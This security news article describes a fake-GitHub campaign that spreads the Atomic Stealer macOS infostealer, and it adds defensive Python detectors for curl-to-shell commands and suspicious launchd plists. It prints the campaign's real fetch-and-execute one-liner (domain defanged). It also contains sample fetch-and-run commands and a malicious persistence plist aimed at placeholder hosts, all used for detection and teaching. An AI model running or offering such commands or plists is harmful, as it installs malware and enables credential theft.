GitHub Hosts Malware from Malwarebytes, LastPass, Citibank, SentinelOne, and More
A large-scale campaign targeting Mac users is leveraging fake GitHub pages to distribute information-stealing malware disguised as popular legitimate applications.
Among the impersonated software are Malwarebytes for Mac, LastPass, Citibank, SentinelOne, and scores of other well-known brands.
Although brand impersonation is nothing new, this campaign demonstrates the evolving tactics cybercriminals employ to entice users into installing harmful code themselves.
Threat researchers from LastPass Threat Intelligence and Malwarebytes have identified numerous GitHub pages purporting to host macOS installers for trusted applications.
In several instances, attackers purchase sponsored Google ads that direct users to these malicious pages instead of official vendor sites.
In other cases, the campaign relies on SEO-poisoning techniques to boost the fake repositories in search results for queries such as “Malwarebytes GitHub macOS.” Once lured to the site, unwitting users are presented with a “GET [APPLICATION]” button.

Clicking it leads to a download page with step-by-step instructions that have the victim fetch and execute an installer script from a newly registered domain. Because the script is pasted into Terminal rather than opened as a downloaded app bundle, Gatekeeper's signature and notarization checks never come into play, and nothing is shown to the user for review before it runs.
The goal of this operation is to deploy Atomic Stealer (also known as AMOS), a macOS information stealer that harvests browser data, clipboard contents, and stored credentials.

Both Malwarebytes for Mac and ThreatDown flag and block this variant, yet the initial social engineering remains shockingly effective against less cautious users.
Technical Breakdown of the Infection Chain
The installation process relies entirely on a single-line shell command that users are instructed to copy and paste into their macOS Terminal:
/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"
Here’s how it works:
- curl -fsSL fetches the remote script with no progress output (-s), still reporting errors (-S), following any redirects (-L), and exiting non-zero instead of saving an HTML error page on an HTTP failure (-f).
- Wrapping the curl invocation in $(…) substitutes the downloaded script text into the argument of the outer bash -c.
- The outer shell then executes that text immediately, so the script runs without ever being displayed to the user for review.
Attackers have even encoded intermediate URLs in base64 to obfuscate the true destination, making detection by casual observers more difficult.
Because a command pasted into Terminal never passes through Gatekeeper's signature and notarization checks, and the one-liner asks for no administrator password, the script runs with the logged-in user's privileges. That is enough to persist by dropping a plist into ~/Library/LaunchAgents; writing to /Library/LaunchDaemons requires root, so the script would have to obtain administrator credentials by some other means first.
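As an added example (not code from the article or from either research team), the following Python snippet turns the indicators above into a check that can be run over command lines as an EDR process feed or a shell-history review would record them. It flags the three shapes of "execute whatever curl returns" (command substitution, a pipe, process substitution) and decodes base64 blobs embedded in the command line to surface hidden URLs. The sample command lines and the .invalid domains are constructed for illustration; nothing here is a real indicator from the campaign.

```python
import base64
import re

# Delivery shapes described above: a shell told to execute whatever curl
# returns, via command substitution, a pipe, or process substitution.
# Heuristic patterns; tune them to your own telemetry.
SUBST_TO_SHELL = re.compile(r'(?:ba|z)?sh\s+-c\s+["\']?\$\(\s*curl\b')
PIPE_TO_SHELL = re.compile(r'curl\b[^|]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b')
PROCSUB_TO_SHELL = re.compile(r'(?:ba|z)?sh\s+<\(\s*curl\b')
# A run of base64 alphabet long enough to hold a URL, not glued to other text.
B64_TOKEN = re.compile(r'(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])')
URL = re.compile(r'https?://[^\s"\'<>)]+')


def decode_hidden_urls(cmdline):
    """Return URLs found inside base64 blobs embedded in the command line."""
    found = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: leave it alone
        found.extend(URL.findall(text))
    return found


def analyze(cmdline):
    """Classify one command line: which indicators fire and every URL it reaches for."""
    indicators = []
    if SUBST_TO_SHELL.search(cmdline):
        indicators.append("command-substitution-to-shell")
    if PIPE_TO_SHELL.search(cmdline):
        indicators.append("pipe-to-shell")
    if PROCSUB_TO_SHELL.search(cmdline):
        indicators.append("process-substitution-to-shell")
    hidden = decode_hidden_urls(cmdline)
    if hidden:
        indicators.append("base64-hidden-url")
    return {
        "cmdline": cmdline,
        "indicators": indicators,
        "urls": sorted(set(URL.findall(cmdline) + hidden)),
    }


# Constructed sample command lines (not from the article); the .invalid
# domains are placeholders.  The third hides its URL in base64, as the
# campaign is reported to do with intermediate URLs.
_HIDDEN = base64.b64encode(b"https://example-installer.invalid/hun/payload.sh").decode()
SAMPLE_COMMAND_LINES = [
    '/bin/bash -c "$(curl -fsSL https://example-installer.invalid/hun/install.sh)"',
    "curl -fsSL https://example-installer.invalid/stage2.sh | bash",
    f'/bin/bash -c "$(curl -fsSL $(echo {_HIDDEN} | base64 -d))"',
    "brew install --cask some-app",
    "curl -fsSL -o /tmp/report.pdf https://example.invalid/report.pdf",
]


def scan(cmdlines=SAMPLE_COMMAND_LINES):
    """Return only the command lines that carry at least one indicator."""
    return [r for r in (analyze(c) for c in cmdlines) if r["indicators"]]


if __name__ == "__main__":
    for hit in scan():
        print(hit["indicators"], hit["urls"])
        print("   ", hit["cmdline"])
```

The two benign samples (a package-manager install and a curl that saves to a file without feeding a shell) produce no indicators; the base64 decoder only reports a blob when it decodes to text containing a URL, which keeps long paths and hashes from producing noise.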
Best Practices to Avoid Fake Software
To protect against this and similar tactics, Mac users should adopt the following guidelines:
Never execute copy-pasted commands from unverified web pages, forums, or GitHub repositories. Commands of the form curl … | bash or bash -c "$(curl …)" should be treated as high risk; if you must use a remote installer, save the script to a file and read it before running it.
Always download applications from the developer’s official website or a reputable app store. If in doubt, verify download URLs with the vendor directly via their support channels.
Disable or exercise caution with sponsored search results. These ads can redirect to malicious pages masquerading as trusted brands.
Employ real-time antimalware protection that includes web filtering. Solutions like Malwarebytes for Mac and ThreatDown detect and block Atomic Stealer variants before installation.
If an infection is suspected, inspect the ~/Library/LaunchAgents and /Library/LaunchDaemons folders for unfamiliar items and remove any suspicious entries.
For comprehensive remediation, consider a full macOS reinstall and restore files only from known clean backups. Reset all account passwords from a device you trust, since anything saved in the browser or keychain on the infected Mac should be assumed stolen, and enable multi-factor authentication to limit what the attacker can do with the credentials already taken.
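To make the LaunchAgents/LaunchDaemons check above repeatable, here is an added Python triage script (not from the article or the vendors it names). It parses each launchd property list with the standard-library plistlib and flags three things a stealer dropped from Terminal tends to exhibit: a program living in a temporary or hidden user directory, an interpreter (bash, sh, zsh, osascript) whose arguments pull something down with curl or decode base64, and a com.apple.* label in a folder where Apple never installs its own agents (Apple's live under /System/Library). The embedded plists are constructed samples with placeholder paths and a .invalid domain; the real-folder scan at the bottom only runs if those folders exist.

```python
import os
import plistlib
import re

INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python", "python3", "perl"}
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
HIDDEN_USER_DIR = re.compile(r"^/Users/[^/]+/\.")
DOWNLOADER = re.compile(r"\b(?:curl|wget|nscurl|base64)\b")


def triage_plist(filename, data):
    """Parse one launchd plist (XML or binary) and return the indicators it trips."""
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    indicators = []
    # Legitimate agents point at /Applications, /usr, or a vendor dir under
    # ~/Library/Application Support, not at temp or dot-directories.
    if program.startswith(STAGING_DIRS) or HIDDEN_USER_DIR.match(program):
        indicators.append("program-in-staging-dir")
    # An interpreter whose arguments fetch or decode code is a stage-2 loader.
    if os.path.basename(program) in INTERPRETERS and any(DOWNLOADER.search(a) for a in args[1:]):
        indicators.append("interpreter-runs-inline-download")
    # Apple's own launchd jobs live in /System/Library/Launch*; a com.apple.*
    # label in ~/Library or /Library is impersonation (heuristic).
    if label.startswith("com.apple."):
        indicators.append("apple-label-outside-system")
    return {"file": filename, "label": label, "program": program, "indicators": indicators}


def scan_directory(path):
    """Triage every .plist in a real LaunchAgents or LaunchDaemons folder."""
    results = []
    if not os.path.isdir(path):
        return results
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(path, name), "rb") as fh:
                results.append(triage_plist(name, fh.read()))
        except (plistlib.InvalidFileException, OSError) as exc:
            results.append({"file": name, "label": "", "program": "",
                            "indicators": [f"unreadable: {exc}"]})
    return results


# Constructed sample plists (not artefacts from the article).  The vendor
# updater is benign; the other two imitate how a Terminal-installed stealer
# might persist with only the user's own privileges.
SAMPLE_PLISTS = {
    "com.example.vendor.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.vendor.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/VendorApp.app/Contents/MacOS/updater</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "com.apple.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string><string>-c</string>
    <string>curl -fsSL https://example-installer.invalid/hun/stage2.sh | bash</string>
  </array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>""",
    "com.example.sync.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.sync</string>
  <key>Program</key><string>/Users/alice/.cache/.sync</string>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}


if __name__ == "__main__":
    for name, data in SAMPLE_PLISTS.items():
        print(triage_plist(name, data))
    for folder in (os.path.expanduser("~/Library/LaunchAgents"), "/Library/LaunchDaemons"):
        for hit in scan_directory(folder):
            if hit["indicators"]:
                print(folder, hit)
```

Treat the output as a shortlist for manual review rather than a verdict: the staging-directory and Apple-label checks are heuristics, and a flagged job should be confirmed by reading the program it points at before you unload and delete it.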
Although GitHub is generally a trusted platform for open-source software, this campaign illustrates how adversaries can weaponize it by impersonating legitimate brands.
Vigilance, cautious download practices, and robust endpoint protection remain the best defenses against such rapidly evolving threats.